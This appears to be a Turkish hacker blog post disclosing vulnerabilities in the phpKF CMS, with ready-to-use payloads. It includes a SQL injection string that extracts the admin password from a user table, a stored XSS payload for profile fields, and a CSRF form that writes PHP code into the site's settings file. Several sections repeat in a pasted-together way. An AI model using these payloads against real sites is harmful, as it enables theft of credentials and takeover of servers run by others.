phpKF - Multi Vulnerabilities (SQL Injection , XSS , CSRF)
Ahmethan G.
·
· Yorum Gönder
spyda mectruy paylaşmış dün gece benimde canım sıkılıyordu bi göz atayım dedim birsürü açık çıktı. script eski bunu göz önünde bulundurursak böyle açıklar normal. umarım sahipleri kısa zamanda görür ve kapatırlar.
SQL Injection:
phpkf-yonetim/phpkf-bilesenler/guvenlik.php
Line : 69
payload:
XSS Vuln:
mectruy'nin de buldugu bir xss var ama ben mec'in buldugu xss'i koymuyorum kendisi belki konu vs acmak ister. ben sadece kendi bulduklarimi yaziyorum.
/uye-profil.php?kp=degistir
payload: <script>alert(1)</script>
injectable area : Imza and Hakkinda
CSRF Vuln:
phpkf-yonetim/guncelle.php
Line : 29
PoC:
# Title : phpKF - MUlti Vulnerabilties
# Author : BlackDewiL
#Desc. : Sinava 27gun var ugrastigimiz seylere bak aq
#Tested : Windows 7 , Parrot OS
# mail-msn : milit4rizm[at]gmail[dot]com
# Home : http://kendinemuslum4n.blogspot.com & headshotz.org
# Date : 18/05/2019
# greetz : T3CH.L30N , init1ove , baybars , l4netly , Nicx , bozkurt97 , DeepiMpacT , KnockOut , DarkHunter
phpkf-yonetim/phpkf-bilesenler/guvenlik.php
Line : 69
$vtsorgu = "SELECT id,yonetim_kimlik,kullanici_kimlik,yetki,son_hareket,kul_ip FROM $tablo_kullanicilar WHERE yonetim_kimlik='$_COOKIE[yonetim_kimlik]' AND kullanici_kimlik='$_COOKIE[kullanici_kimlik]' LIMIT 1";
%bf%27 UNION SELECT sifre FROM phpkfcms_kullanicilar WHERE id='1
mectruy'nin de buldugu bir xss var ama ben mec'in buldugu xss'i koymuyorum kendisi belki konu vs acmak ister. ben sadece kendi bulduklarimi yaziyorum.
/uye-profil.php?kp=degistir
payload: <script>alert(1)</script>
injectable area : Imza and Hakkinda
CSRF Vuln:
phpkf-yonetim/guncelle.php
Line : 29
if ( (isset($_POST['kurulum_yapildi'])) AND (isset($_POST['ayar_bilgi'])) AND ($_POST['kurulum_yapildi'] == 'ayar_dosyasi') )
<form action = "http://localhost/phpkf-cms/phpkf-kurulum/guncelle.php" method = "POST"> <input type = "hidden" name = "kurulum_yapildi" value = "ayar_dosyasi"> <input type = "hidden" name = "ayar_bilgi" value = "<?=phpinfo();?>"> <input type = "submit" value = "git"> </form> <span>b4style</span>
Hiç yorum yok
Kaydol: Atom / RSSBe the first to comment.